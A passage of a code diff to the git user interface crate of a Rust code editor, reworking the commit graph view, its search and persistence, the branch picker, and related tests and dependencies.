div().flex_1().size_full().child( - Table::new(4) - .interactable(&self.table_interaction_state) - .hide_row_borders() - .hide_row_hover() - .header(vec![ - Label::new("Description") - .color(Color::Muted) - .into_any_element(), - Label::new("Date").color(Color::Muted).into_any_element(), - Label::new("Author").color(Color::Muted).into_any_element(), - Label::new("Commit").color(Color::Muted).into_any_element(), - ]) - .column_widths( - [ - DefiniteLength::Fraction(description_width_fraction), - DefiniteLength::Fraction(date_width_fraction), - DefiniteLength::Fraction(author_width_fraction), - DefiniteLength::Fraction(commit_width_fraction), - ] - .to_vec(), - ) - .resizable_columns( + .child(render_table_header( + TableRow::from_vec( vec![ - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, + Label::new("Graph") + .color(Color::Muted) + .truncate() + .into_any_element(), + Label::new("Description") + .color(Color::Muted) + .into_any_element(), + Label::new("Date").color(Color::Muted).into_any_element(), + Label::new("Author").color(Color::Muted).into_any_element(), + Label::new("Commit").color(Color::Muted).into_any_element(), ], - &self.table_column_widths, - cx, - ) - .map_row(move |(index, row), window, cx| { - let is_selected = selected_entry_idx == Some(index); - let is_hovered = hovered_entry_idx == Some(index); - let is_focused = focus_handle.is_focused(window); - let weak = weak_self.clone(); - let weak_for_hover = weak.clone(); - - let hover_bg = cx.theme().colors().element_hover.opacity(0.6); - let selected_bg = if is_focused { - cx.theme().colors().element_selected - } else { - cx.theme().colors().element_hover - }; - - row.h(row_height) - .when(is_selected, |row| row.bg(selected_bg)) - .when(is_hovered && !is_selected, |row| row.bg(hover_bg)) - .on_hover(move |&is_hovered, _, cx| { - weak_for_hover - .update(cx, |this, cx| { - if is_hovered { - if this.hovered_entry_idx 
!= Some(index) { - this.hovered_entry_idx = Some(index); - cx.notify(); - } - } else if this.hovered_entry_idx == Some(index) { - // Only clear if this row was the hovered one - this.hovered_entry_idx = None; - cx.notify(); - } - }) - .ok(); - }) - .on_click(move |event, window, cx| { - let click_count = event.click_count(); - weak.update(cx, |this, cx| { - this.select_entry(index, cx); - if click_count >= 2 { - this.open_commit_view(index, window, cx); - } - }) - .ok(); - }) - .into_any_element() - }) - .uniform_list( - "git-graph-commits", - commit_count, - cx.processor(Self::render_table_rows), + 5, ), - ) - }) + header_context, + Some(header_resize_info), + Some(self.column_widths.entity_id()), + cx, + )) + .child({ + let row_height = self.row_height; + let selected_entry_idx = self.selected_entry_idx; + let hovered_entry_idx = self.hovered_entry_idx; + let weak_self = cx.weak_entity(); + let focus_handle = self.focus_handle.clone(); + + bind_redistributable_columns( + div() + .relative() + .flex_1() + .w_full() + .overflow_hidden() + .child( + h_flex() + .size_full() + .child( + div() + .w(DefiniteLength::Fraction(graph_fraction)) + .h_full() + .min_w_0() + .overflow_hidden() + .child( + div() + .id("graph-canvas") + .size_full() + .overflow_hidden() + .child( + div() + .size_full() + .child(self.render_graph(window, cx)), + ) + .on_scroll_wheel( + cx.listener(Self::handle_graph_scroll), + ) + .on_mouse_move( + cx.listener(Self::handle_graph_mouse_move), + ) + .on_click(cx.listener(Self::handle_graph_click)) + .on_hover(cx.listener( + |this, &is_hovered: &bool, _, cx| { + if !is_hovered + && this.hovered_entry_idx.is_some() + { + this.hovered_entry_idx = None; + cx.notify(); + } + }, + )), + ), + ) + .child( + div() + .w(DefiniteLength::Fraction(table_fraction)) + .h_full() + .min_w_0() + .child( + Table::new(4) + .interactable(&self.table_interaction_state) + .hide_row_borders() + .hide_row_hover() + .width_config(table_width_config) + .map_row(move |(index, 
row), window, cx| { + let is_selected = + selected_entry_idx == Some(index); + let is_hovered = + hovered_entry_idx == Some(index); + let is_focused = + focus_handle.is_focused(window); + let weak = weak_self.clone(); + let weak_for_hover = weak.clone(); + + let hover_bg = cx + .theme() + .colors() + .element_hover + .opacity(0.6); + let selected_bg = if is_focused { + cx.theme().colors().element_selected + } else { + cx.theme().colors().element_hover + }; + + row.h(row_height) + .when(is_selected, |row| row.bg(selected_bg)) + .when( + is_hovered && !is_selected, + |row| row.bg(hover_bg), + ) + .on_hover(move |&is_hovered, _, cx| { + weak_for_hover + .update(cx, |this, cx| { + if is_hovered { + if this.hovered_entry_idx + != Some(index) + { + this.hovered_entry_idx = + Some(index); + cx.notify(); + } + } else if this + .hovered_entry_idx + == Some(index) + { + this.hovered_entry_idx = + None; + cx.notify(); + } + }) + .ok(); + }) + .on_click(move |event, window, cx| { + let click_count = event.click_count(); + weak.update(cx, |this, cx| { + this.select_entry( + index, + ScrollStrategy::Center, + cx, + ); + if click_count >= 2 { + this.open_commit_view( + index, + window, + cx, + ); + } + }) + .ok(); + }) + .into_any_element() + }) + .uniform_list( + "git-graph-commits", + commit_count, + cx.processor(Self::render_table_rows), + ), + ), + ), + ) + .child(render_redistributable_columns_resize_handles( + &self.column_widths, + window, + cx, + )), + self.column_widths.clone(), + ) + }), + ) .on_drag_move::(cx.listener(|this, event, window, cx| { this.commit_details_split_state.update(cx, |state, cx| { state.on_drag_move(event, window, cx); @@ -2334,10 +2845,33 @@ impl Render for GitGraph { this.open_selected_commit_view(window, cx); })) .on_action(cx.listener(Self::cancel)) + .on_action(cx.listener(|this, _: &FocusSearch, window, cx| { + this.search_state + .editor + .update(cx, |editor, cx| editor.focus_handle(cx).focus(window, cx)); + })) + 
.on_action(cx.listener(Self::select_first)) .on_action(cx.listener(Self::select_prev)) .on_action(cx.listener(Self::select_next)) + .on_action(cx.listener(Self::select_last)) .on_action(cx.listener(Self::confirm)) - .child(content) + .on_action(cx.listener(|this, _: &SelectNextMatch, _window, cx| { + this.select_next_match(cx); + })) + .on_action(cx.listener(|this, _: &SelectPreviousMatch, _window, cx| { + this.select_previous_match(cx); + })) + .on_action(cx.listener(|this, _: &ToggleCaseSensitive, _window, cx| { + this.search_state.case_sensitive = !this.search_state.case_sensitive; + this.search_state.state.next_state(); + cx.notify(); + })) + .child( + v_flex() + .size_full() + .child(self.render_search_bar(cx)) + .child(div().flex_1().child(content)), + ) .children(self.context_menu.as_ref().map(|(menu, position, _)| { deferred( anchored() @@ -2347,6 +2881,10 @@ impl Render for GitGraph { ) .with_priority(1) })) + .on_action(cx.listener(|_, _: &buffer_search::Deploy, window, cx| { + window.dispatch_action(Box::new(FocusSearch), cx); + cx.stop_propagation(); + })) } } @@ -2366,7 +2904,7 @@ impl Item for GitGraph { } fn tab_tooltip_content(&self, cx: &App) -> Option { - let repo_name = self.get_selected_repository(cx).and_then(|repo| { + let repo_name = self.get_repository(cx).and_then(|repo| { repo.read(cx) .work_directory_abs_path .file_name() @@ -2386,7 +2924,7 @@ impl Item for GitGraph { } fn tab_content_text(&self, _detail: usize, cx: &App) -> SharedString { - self.get_selected_repository(cx) + self.get_repository(cx) .and_then(|repo| { repo.read(cx) .work_directory_abs_path @@ -2405,7 +2943,7 @@ impl Item for GitGraph { } } -impl SerializableItem for GitGraph { +impl workspace::SerializableItem for GitGraph { fn serialized_item_kind() -> &'static str { "GitGraph" } @@ -2420,29 +2958,51 @@ impl SerializableItem for GitGraph { alive_items, workspace_id, "git_graphs", - &persistence::GIT_GRAPHS, + &persistence::GitGraphsDb::global(cx), cx, ) } fn deserialize( 
- project: Entity, + project: Entity, workspace: WeakEntity, workspace_id: workspace::WorkspaceId, item_id: workspace::ItemId, window: &mut Window, cx: &mut App, ) -> Task>> { - if persistence::GIT_GRAPHS - .get_git_graph(item_id, workspace_id) - .ok() - .is_some_and(|is_open| is_open) - { - let git_graph = cx.new(|cx| GitGraph::new(project, workspace, None, window, cx)); - Task::ready(Ok(git_graph)) - } else { - Task::ready(Err(anyhow::anyhow!("No git graph to deserialize"))) - } + let db = persistence::GitGraphsDb::global(cx); + let Some(repo_work_path) = db.get_git_graph(item_id, workspace_id).ok().flatten() else { + return Task::ready(Err(anyhow::anyhow!("No git graph to deserialize"))); + }; + + let window_handle = window.window_handle(); + let project = project.read(cx); + let git_store = project.git_store().clone(); + let wait = project.wait_for_initial_scan(cx); + + cx.spawn(async move |cx| { + wait.await; + + cx.update_window(window_handle, |_, window, cx| { + let path = repo_work_path.as_path(); + + let repositories = git_store.read(cx).repositories(); + let repo_id = repositories.iter().find_map(|(&repo_id, repo)| { + if repo.read(cx).snapshot().work_directory_abs_path.as_ref() == path { + Some(repo_id) + } else { + None + } + }); + + let Some(repo_id) = repo_id else { + return Err(anyhow::anyhow!("Repository not found for path: {:?}", path)); + }; + + Ok(cx.new(|cx| GitGraph::new(repo_id, git_store, workspace, None, window, cx))) + })? 
+ }) } fn serialize( @@ -2454,9 +3014,17 @@ impl SerializableItem for GitGraph { cx: &mut Context, ) -> Option>> { let workspace_id = workspace.database_id()?; + let repo = self.get_repository(cx)?; + let repo_working_path = repo + .read(cx) + .snapshot() + .work_directory_abs_path + .to_string_lossy() + .to_string(); + + let db = persistence::GitGraphsDb::global(cx); Some(cx.background_spawn(async move { - persistence::GIT_GRAPHS - .save_git_graph(item_id, workspace_id, true) + db.save_git_graph(item_id, workspace_id, repo_working_path) .await })) } @@ -2467,6 +3035,8 @@ impl SerializableItem for GitGraph { } mod persistence { + use std::path::PathBuf; + use db::{ query, sqlez::{domain::Domain, thread_safe_connection::ThreadSafeConnection}, @@ -2479,29 +3049,34 @@ mod persistence { impl Domain for GitGraphsDb { const NAME: &str = stringify!(GitGraphsDb); - const MIGRATIONS: &[&str] = (&[sql!( - CREATE TABLE git_graphs ( - workspace_id INTEGER, - item_id INTEGER UNIQUE, - is_open INTEGER DEFAULT FALSE, - - PRIMARY KEY(workspace_id, item_id), - FOREIGN KEY(workspace_id) REFERENCES workspaces(workspace_id) - ON DELETE CASCADE - ) STRICT; - )]); + const MIGRATIONS: &[&str] = &[ + sql!( + CREATE TABLE git_graphs ( + workspace_id INTEGER, + item_id INTEGER UNIQUE, + is_open INTEGER DEFAULT FALSE, + + PRIMARY KEY(workspace_id, item_id), + FOREIGN KEY(workspace_id) REFERENCES workspaces(workspace_id) + ON DELETE CASCADE + ) STRICT; + ), + sql!( + ALTER TABLE git_graphs ADD COLUMN repo_working_path TEXT; + ), + ]; } - db::static_connection!(GIT_GRAPHS, GitGraphsDb, [WorkspaceDb]); + db::static_connection!(GitGraphsDb, [WorkspaceDb]); impl GitGraphsDb { query! 
{ pub async fn save_git_graph( item_id: workspace::ItemId, workspace_id: workspace::WorkspaceId, - is_open: bool + repo_working_path: String ) -> Result<()> { - INSERT OR REPLACE INTO git_graphs(item_id, workspace_id, is_open) + INSERT OR REPLACE INTO git_graphs(item_id, workspace_id, repo_working_path) VALUES (?, ?, ?) } } @@ -2510,8 +3085,8 @@ mod persistence { pub fn get_git_graph( item_id: workspace::ItemId, workspace_id: workspace::WorkspaceId - ) -> Result { - SELECT is_open + ) -> Result> { + SELECT repo_working_path FROM git_graphs WHERE item_id = ? AND workspace_id = ? } @@ -2536,20 +3111,12 @@ mod tests { use smallvec::{SmallVec, smallvec}; use std::path::Path; use std::sync::{Arc, Mutex}; - use workspace::MultiWorkspace; fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - }); - } - - fn init_test_with_theme(cx: &mut TestAppContext) { - cx.update(|cx| { - let settings_store = SettingsStore::test(cx); - cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); } @@ -3245,14 +3812,8 @@ mod tests { assert!( observed_repository_events .iter() - .any(|event| matches!(event, RepositoryEvent::BranchChanged)), - "initial repository scan should emit BranchChanged" - ); - assert!( - observed_repository_events - .iter() - .any(|event| matches!(event, RepositoryEvent::MergeHeadsChanged)), - "initial repository scan should emit MergeHeadsChanged" + .any(|event| matches!(event, RepositoryEvent::HeadChanged)), + "initial repository scan should emit HeadChanged" ); let commit_count_after = repository.read_with(cx, |repo, _| { repo.get_graph_data(crate::LogSource::default(), crate::LogOrder::default()) @@ -3268,7 +3829,7 @@ mod tests { #[gpui::test] async fn test_graph_data_repopulated_from_cache_after_repo_switch(cx: &mut TestAppContext) { - init_test_with_theme(cx); + init_test(cx); let fs = 
FakeFs::new(cx.executor()); fs.insert_tree( @@ -3321,13 +3882,21 @@ mod tests { first_repository.update(cx, |repository, cx| repository.set_as_active_repository(cx)); cx.run_until_parked(); - let (multi_workspace, cx) = - cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (multi_workspace, cx) = cx.add_window_view(|window, cx| { + workspace::MultiWorkspace::test_new(project.clone(), window, cx) + }); let workspace_weak = multi_workspace.read_with(&*cx, |multi, _| multi.workspace().downgrade()); let git_graph = cx.new_window_entity(|window, cx| { - GitGraph::new(project.clone(), workspace_weak, None, window, cx) + GitGraph::new( + first_repository.read(cx).id, + project.read(cx).git_store().clone(), + workspace_weak, + None, + window, + cx, + ) }); cx.run_until_parked(); @@ -3339,8 +3908,8 @@ mod tests { "graph data should have been loaded, got 0 commits" ); - second_repository.update(&mut *cx, |repository, cx| { - repository.set_as_active_repository(cx) + git_graph.update(cx, |graph, cx| { + graph.set_repo_id(second_repository.read(cx).id, cx) }); cx.run_until_parked(); @@ -3351,20 +3920,234 @@ mod tests { "graph_data should be cleared after switching away" ); - first_repository.update(&mut *cx, |repository, cx| { - repository.set_as_active_repository(cx) + git_graph.update(cx, |graph, cx| { + graph.set_repo_id(first_repository.read(cx).id, cx) }); + cx.run_until_parked(); - git_graph.update_in(&mut *cx, |this, window, cx| { - this.render(window, cx); - }); + cx.draw( + point(px(0.), px(0.)), + gpui::size(px(1200.), px(800.)), + |_, _| git_graph.clone().into_any_element(), + ); cx.run_until_parked(); - let commit_count_after_switch_back = + // Verify graph data is reloaded from repository cache on switch back + let reloaded_commit_count = git_graph.read_with(&*cx, |graph, _| graph.graph_data.commits.len()); assert_eq!( - initial_commit_count, commit_count_after_switch_back, - "graph_data should be repopulated from cache 
after switching back to the same repo" + reloaded_commit_count, + commits.len(), + "graph data should be reloaded after switching back" ); } + + #[gpui::test] + async fn test_graph_data_reloaded_after_stash_change(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + Path::new("/project"), + json!({ + ".git": {}, + "file.txt": "content", + }), + ) + .await; + + let initial_head = Oid::from_bytes(&[1; 20]).unwrap(); + let initial_stash = Oid::from_bytes(&[2; 20]).unwrap(); + let updated_head = Oid::from_bytes(&[3; 20]).unwrap(); + let updated_stash = Oid::from_bytes(&[4; 20]).unwrap(); + + fs.set_graph_commits( + Path::new("/project/.git"), + vec![ + Arc::new(InitialGraphCommitData { + sha: initial_head, + parents: smallvec![initial_stash], + ref_names: vec!["HEAD".into(), "refs/heads/main".into()], + }), + Arc::new(InitialGraphCommitData { + sha: initial_stash, + parents: smallvec![], + ref_names: vec!["refs/stash".into()], + }), + ], + ); + fs.with_git_state(Path::new("/project/.git"), true, |state| { + state.stash_entries = git::stash::GitStash { + entries: vec![git::stash::StashEntry { + index: 0, + oid: initial_stash, + message: "initial stash".to_string(), + branch: Some("main".to_string()), + timestamp: 1, + }] + .into(), + }; + }) + .unwrap(); + + let project = Project::test(fs.clone(), [Path::new("/project")], cx).await; + cx.run_until_parked(); + + let repository = project.read_with(cx, |project, cx| { + project + .active_repository(cx) + .expect("should have a repository") + }); + + let (multi_workspace, cx) = cx.add_window_view(|window, cx| { + workspace::MultiWorkspace::test_new(project.clone(), window, cx) + }); + let workspace_weak = + multi_workspace.read_with(&*cx, |multi, _| multi.workspace().downgrade()); + let git_graph = cx.new_window_entity(|window, cx| { + GitGraph::new( + repository.read(cx).id, + project.read(cx).git_store().clone(), + workspace_weak, + None, + window, + cx, + ) + }); + 
cx.run_until_parked(); + + let initial_shas = git_graph.read_with(&*cx, |graph, _| { + graph + .graph_data + .commits + .iter() + .map(|commit| commit.data.sha) + .collect::>() + }); + assert_eq!(initial_shas, vec![initial_head, initial_stash]); + + fs.set_graph_commits( + Path::new("/project/.git"), + vec![ + Arc::new(InitialGraphCommitData { + sha: updated_head, + parents: smallvec![updated_stash], + ref_names: vec!["HEAD".into(), "refs/heads/main".into()], + }), + Arc::new(InitialGraphCommitData { + sha: updated_stash, + parents: smallvec![], + ref_names: vec!["refs/stash".into()], + }), + ], + ); + fs.with_git_state(Path::new("/project/.git"), true, |state| { + state.stash_entries = git::stash::GitStash { + entries: vec![git::stash::StashEntry { + index: 0, + oid: updated_stash, + message: "updated stash".to_string(), + branch: Some("main".to_string()), + timestamp: 1, + }] + .into(), + }; + }) + .unwrap(); + + project + .update(cx, |project, cx| project.git_scans_complete(cx)) + .await; + cx.run_until_parked(); + + cx.draw( + point(px(0.), px(0.)), + gpui::size(px(1200.), px(800.)), + |_, _| git_graph.clone().into_any_element(), + ); + cx.run_until_parked(); + + let reloaded_shas = git_graph.read_with(&*cx, |graph, _| { + graph + .graph_data + .commits + .iter() + .map(|commit| commit.data.sha) + .collect::>() + }); + assert_eq!(reloaded_shas, vec![updated_head, updated_stash]); + } + + #[gpui::test] + async fn test_git_graph_row_at_position_rounding(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + Path::new("/project"), + serde_json::json!({ + ".git": {}, + "file.txt": "content", + }), + ) + .await; + + let mut rng = StdRng::seed_from_u64(42); + let commits = generate_random_commit_dag(&mut rng, 10, false); + fs.set_graph_commits(Path::new("/project/.git"), commits.clone()); + + let project = Project::test(fs.clone(), [Path::new("/project")], cx).await; + cx.run_until_parked(); + + let repository = 
project.read_with(cx, |project, cx| { + project + .active_repository(cx) + .expect("should have a repository") + }); + + let (multi_workspace, cx) = cx.add_window_view(|window, cx| { + workspace::MultiWorkspace::test_new(project.clone(), window, cx) + }); + + let workspace_weak = + multi_workspace.read_with(&*cx, |multi, _| multi.workspace().downgrade()); + + let git_graph = cx.new_window_entity(|window, cx| { + GitGraph::new( + repository.read(cx).id, + project.read(cx).git_store().clone(), + workspace_weak, + None, + window, + cx, + ) + }); + cx.run_until_parked(); + + git_graph.update(cx, |graph, cx| { + assert!( + graph.graph_data.commits.len() >= 10, + "graph should load dummy commits" + ); + + graph.row_height = px(20.0); + let origin_y = px(100.0); + graph.graph_canvas_bounds.set(Some(Bounds { + origin: point(px(0.0), origin_y), + size: gpui::size(px(100.0), px(1000.0)), + })); + + graph.table_interaction_state.update(cx, |state, _| { + state.set_scroll_offset(point(px(0.0), px(-15.0))) + }); + let pos_y = origin_y + px(10.0); + let absolute_calc_row = graph.row_at_position(pos_y, cx); + + assert_eq!( + absolute_calc_row, + Some(1), + "Row calculation should yield absolute row exactly" + ); + }); + } } diff --git a/crates/git_ui/Cargo.toml b/crates/git_ui/Cargo.toml index 28fac0f849a487c6654e2ac5976191cd3e1a733f..e06d16708697f721d9377365223dc444ba7b08ae 100644 --- a/crates/git_ui/Cargo.toml +++ b/crates/git_ui/Cargo.toml @@ -21,13 +21,12 @@ anyhow.workspace = true askpass.workspace = true buffer_diff.workspace = true call.workspace = true -cloud_llm_client.workspace = true collections.workspace = true component.workspace = true db.workspace = true editor.workspace = true +file_icons.workspace = true futures.workspace = true -feature_flags.workspace = true fuzzy.workspace = true git.workspace = true gpui.workspace = true @@ -44,6 +43,7 @@ panel.workspace = true picker.workspace = true project.workspace = true prompt_store.workspace = true +proto.workspace = 
true remote_connection.workspace = true remote.workspace = true schemars.workspace = true @@ -55,6 +55,7 @@ smol.workspace = true strum.workspace = true telemetry.workspace = true theme.workspace = true +theme_settings.workspace = true time.workspace = true time_format.workspace = true ui.workspace = true @@ -72,7 +73,6 @@ windows.workspace = true [dev-dependencies] ctor.workspace = true editor = { workspace = true, features = ["test-support"] } -git_hosting_providers.workspace = true gpui = { workspace = true, features = ["test-support"] } indoc.workspace = true pretty_assertions.workspace = true diff --git a/crates/git_ui/src/blame_ui.rs b/crates/git_ui/src/blame_ui.rs index e91d98038818224594c1f139f70d7c3d11f2a78b..47d781c4870ade9688b93b75db5a68dd26865ca8 100644 --- a/crates/git_ui/src/blame_ui.rs +++ b/crates/git_ui/src/blame_ui.rs @@ -11,7 +11,7 @@ use gpui::{ use markdown::{Markdown, MarkdownElement}; use project::{git_store::Repository, project_settings::ProjectSettings}; use settings::Settings as _; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use time::OffsetDateTime; use ui::{ContextMenu, CopyButton, Divider, prelude::*, tooltip_container}; use workspace::Workspace; @@ -322,10 +322,11 @@ impl BlameRenderer for GitBlameRenderer { format!("#{}", pr.number), ) .color(Color::Muted) - .icon(IconName::PullRequest) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon( + Icon::new(IconName::PullRequest) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_, _, cx| { cx.stop_propagation(); cx.open_url(pr.url.as_str()) @@ -339,10 +340,11 @@ impl BlameRenderer for GitBlameRenderer { short_commit_id.clone(), ) .color(Color::Muted) - .icon(IconName::FileGit) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon( + Icon::new(IconName::FileGit) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_, window, 
cx| { CommitView::open( commit_summary.sha.clone().into(), diff --git a/crates/git_ui/src/branch_picker.rs b/crates/git_ui/src/branch_picker.rs index 08290cb88a273d1f3f17da5c08a5b4a402aa74cd..83c8119a077ac1c024dbb3b3df948f762b072ec1 100644 --- a/crates/git_ui/src/branch_picker.rs +++ b/crates/git_ui/src/branch_picker.rs @@ -16,10 +16,7 @@ use project::project_settings::ProjectSettings; use settings::Settings; use std::sync::Arc; use time::OffsetDateTime; -use ui::{ - Divider, HighlightedLabel, KeyBinding, ListHeader, ListItem, ListItemSpacing, Tooltip, - prelude::*, -}; +use ui::{Divider, HighlightedLabel, KeyBinding, ListItem, ListItemSpacing, Tooltip, prelude::*}; use ui_input::ErasedEditor; use util::ResultExt; use workspace::notifications::DetachAndPromptErr; @@ -486,28 +483,28 @@ impl BranchListDelegate { let workspace = self.workspace.clone(); cx.spawn_in(window, async move |picker, cx| { - let mut is_remote = false; + let is_remote; let result = match &entry { - Entry::Branch { branch, .. } => match branch.remote_name() { - Some(remote_name) => { - is_remote = true; - repo.update(cx, |repo, _| repo.remove_remote(remote_name.to_string())) - .await? - } - None => { - repo.update(cx, |repo, _| repo.delete_branch(branch.name().to_string())) - .await? + Entry::Branch { branch, .. } => { + if branch.is_head { + return Ok(()); } - }, + + is_remote = branch.is_remote(); + repo.update(cx, |repo, _| { + repo.delete_branch(is_remote, branch.name().to_string()) + }) + .await? 
+ } _ => { - log::error!("Failed to delete remote: wrong entry to delete"); + log::error!("Failed to delete entry: wrong entry to delete"); return Ok(()); } }; if let Err(e) = result { if is_remote { - log::error!("Failed to delete remote: {}", e); + log::error!("Failed to delete remote branch: {}", e); } else { log::error!("Failed to delete branch: {}", e); } @@ -517,7 +514,7 @@ impl BranchListDelegate { if is_remote { show_error_toast( workspace, - format!("remote remove {}", entry.name()), + format!("branch -dr {}", entry.name()), e, cx, ) @@ -566,8 +563,7 @@ impl PickerDelegate for BranchListDelegate { match self.state { PickerState::List | PickerState::NewRemote | PickerState::NewBranch => { match self.branch_filter { - BranchFilter::All => "Select branch or remote…", - BranchFilter::Remote => "Select remote…", + BranchFilter::All | BranchFilter::Remote => "Select branch…", } } PickerState::CreateRemote(_) => "Enter a name for this remote…", @@ -891,13 +887,13 @@ impl PickerDelegate for BranchListDelegate { let entry_icon = match entry { Entry::NewUrl { .. } | Entry::NewBranch { .. } | Entry::NewRemoteName { .. } => { - Icon::new(IconName::Plus).color(Color::Muted) + IconName::Plus } Entry::Branch { branch, .. } => { if branch.is_remote() { - Icon::new(IconName::Screen).color(Color::Muted) + IconName::Screen } else { - Icon::new(IconName::GitBranchAlt).color(Color::Muted) + IconName::GitBranchAlt } } }; @@ -929,8 +925,11 @@ impl PickerDelegate for BranchListDelegate { Entry::NewUrl { .. } | Entry::NewBranch { .. } | Entry::NewRemoteName { .. 
} ); - let deleted_branch_icon = |entry_ix: usize, is_head_branch: bool| { + let is_head_branch = entry.as_branch().is_some_and(|branch| branch.is_head); + + let deleted_branch_icon = |entry_ix: usize| { IconButton::new(("delete", entry_ix), IconName::Trash) + .icon_size(IconSize::Small) .tooltip(move |_, cx| { Tooltip::for_action_in( "Delete Branch", @@ -939,7 +938,6 @@ impl PickerDelegate for BranchListDelegate { cx, ) }) - .disabled(is_head_branch) .on_click(cx.listener(move |this, _, window, cx| { this.delegate.delete_at(entry_ix, window, cx); })) @@ -950,6 +948,7 @@ impl PickerDelegate for BranchListDelegate { let focus_handle = self.focus_handle.clone(); IconButton::new("create_from_default", IconName::GitBranchPlus) + .icon_size(IconSize::Small) .tooltip(move |_, cx| { Tooltip::for_action_in( tooltip_label.clone(), @@ -972,137 +971,139 @@ impl PickerDelegate for BranchListDelegate { .child( h_flex() .w_full() - .gap_3() + .gap_2p5() .flex_grow() - .child(entry_icon) + .child( + Icon::new(entry_icon) + .color(Color::Muted) + .size(IconSize::Small), + ) .child( v_flex() .id("info_container") .w_full() .child(entry_title) - .child( - h_flex() - .w_full() - .justify_between() - .gap_1p5() - .when(self.style == BranchListStyle::Modal, |el| { - el.child(div().max_w_96().child({ - let message = match entry { - Entry::NewUrl { url } => { - format!("Based off {url}") - } - Entry::NewRemoteName { url, .. } => { - format!("Based off {url}") - } - Entry::NewBranch { .. } => { - if let Some(current_branch) = - self.repo.as_ref().and_then(|repo| { - repo.read(cx) - .branch - .as_ref() - .map(|b| b.name()) - }) - { - format!("Based off {}", current_branch) - } else { - "Based off the current branch" - .to_string() - } - } - Entry::Branch { .. 
} => { - let show_author_name = - ProjectSettings::get_global(cx) - .git - .branch_picker - .show_author_name; - - subject.map_or( - "No commits found".into(), - |subject| { - if show_author_name - && let Some(author) = - author_name - { - format!( - "{} • {}", - author, subject - ) - } else { - subject.to_string() - } - }, - ) - } - }; - - Label::new(message) - .size(LabelSize::Small) - .color(Color::Muted) - .truncate() - })) - }) - .when_some(commit_time, |label, commit_time| { - label.child( - Label::new(commit_time) - .size(LabelSize::Small) - .color(Color::Muted), - ) - }), - ) + .child({ + let message = match entry { + Entry::NewUrl { url } => format!("Based off {url}"), + Entry::NewRemoteName { url, .. } => { + format!("Based off {url}") + } + Entry::NewBranch { .. } => { + if let Some(current_branch) = + self.repo.as_ref().and_then(|repo| { + repo.read(cx).branch.as_ref().map(|b| b.name()) + }) + { + format!("Based off {}", current_branch) + } else { + "Based off the current branch".to_string() + } + } + Entry::Branch { .. } => String::new(), + }; + + if matches!(entry, Entry::Branch { .. 
}) { + let show_author_name = ProjectSettings::get_global(cx) + .git + .branch_picker + .show_author_name; + let has_author = show_author_name && author_name.is_some(); + let has_commit = commit_time.is_some(); + let author_for_meta = + if show_author_name { author_name } else { None }; + + let dot = || { + Label::new("•") + .alpha(0.5) + .color(Color::Muted) + .size(LabelSize::Small) + }; + + h_flex() + .w_full() + .min_w_0() + .gap_1p5() + .when_some(author_for_meta, |this, author| { + this.child( + Label::new(author) + .color(Color::Muted) + .size(LabelSize::Small), + ) + }) + .when_some(commit_time, |this, time| { + this.when(has_author, |this| this.child(dot())) + .child( + Label::new(time) + .color(Color::Muted) + .size(LabelSize::Small), + ) + }) + .when_some(subject, |this, subj| { + this.when(has_commit, |this| this.child(dot())) + .child( + Label::new(subj.to_string()) + .color(Color::Muted) + .size(LabelSize::Small) + .truncate() + .flex_1(), + ) + }) + .when(!has_commit, |this| { + this.child( + Label::new("No commits found") + .color(Color::Muted) + .size(LabelSize::Small), + ) + }) + .into_any_element() + } else { + Label::new(message) + .size(LabelSize::Small) + .color(Color::Muted) + .truncate() + .into_any_element() + } + }) .when_some( entry.as_branch().map(|b| b.name().to_string()), - |this, branch_name| this.tooltip(Tooltip::text(branch_name)), + |this, branch_name| { + this.map(|this| { + if is_head_branch { + this.tooltip(move |_, cx| { + Tooltip::with_meta( + branch_name.clone(), + None, + "Current Branch", + cx, + ) + }) + } else { + this.tooltip(Tooltip::text(branch_name)) + } + }) + }, ), ), ) - .when( - self.editor_position() == PickerEditorPosition::End && !is_new_items, - |this| { - this.map(|this| { - let is_head_branch = - entry.as_branch().is_some_and(|branch| branch.is_head); - if self.selected_index() == ix { - this.end_slot(deleted_branch_icon(ix, is_head_branch)) - } else { - this.end_hover_slot(deleted_branch_icon(ix, 
is_head_branch)) - } - }) - }, - ) + .when(!is_new_items && !is_head_branch, |this| { + this.end_slot(deleted_branch_icon(ix)) + .show_end_slot_on_hover() + }) .when_some( - if self.editor_position() == PickerEditorPosition::End && is_new_items { + if is_new_items { create_from_default_button } else { None }, |this, create_from_default_button| { - this.map(|this| { - if self.selected_index() == ix { - this.end_slot(create_from_default_button) - } else { - this.end_hover_slot(create_from_default_button) - } - }) + this.end_slot(create_from_default_button) + .show_end_slot_on_hover() }, ), ) } - fn render_header( - &self, - _window: &mut Window, - _cx: &mut Context>, - ) -> Option { - matches!(self.state, PickerState::List).then(|| { - let label = match self.branch_filter { - BranchFilter::All => "Branches", - BranchFilter::Remote => "Remotes", - }; - - ListHeader::new(label).inset(true).into_any_element() - }) - } - fn render_footer(&self, _: &mut Window, cx: &mut Context>) -> Option { if self.editor_position() == PickerEditorPosition::End { return None; @@ -1144,20 +1145,29 @@ impl PickerDelegate for BranchListDelegate { let delete_and_select_btns = h_flex() .gap_1() - .child( - Button::new("delete-branch", "Delete") - .key_binding( - KeyBinding::for_action_in( - &branch_picker::DeleteBranch, - &focus_handle, - cx, - ) - .map(|kb| kb.size(rems_from_px(12.))), + .when( + !selected_entry + .and_then(|entry| entry.as_branch()) + .is_some_and(|branch| branch.is_head), + |this| { + this.child( + Button::new("delete-branch", "Delete") + .key_binding( + KeyBinding::for_action_in( + 